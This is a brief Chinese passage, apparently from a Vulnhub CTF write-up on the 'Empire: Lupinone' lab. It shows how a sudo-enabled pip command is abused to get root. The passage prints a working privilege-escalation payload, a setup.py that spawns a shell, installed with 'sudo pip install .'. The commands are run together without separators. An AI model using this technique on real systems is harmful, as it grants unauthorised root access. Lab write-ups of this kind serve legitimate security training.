vlunhub靶场之EMPIRE: LUPINONE( 二 )


文章插图
发现了pip命令不需要root密码即可执行,那我们就用pip的root权限安装一个shell的程序,成功获取到 root 权限,查看 flag 。
mkdir upfinecd upfineecho "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > setup.pysudo pip install .

vlunhub靶场之EMPIRE: LUPINONE

文章插图
vlunhub靶场之EMPIRE: LUPINONE

文章插图

推荐阅读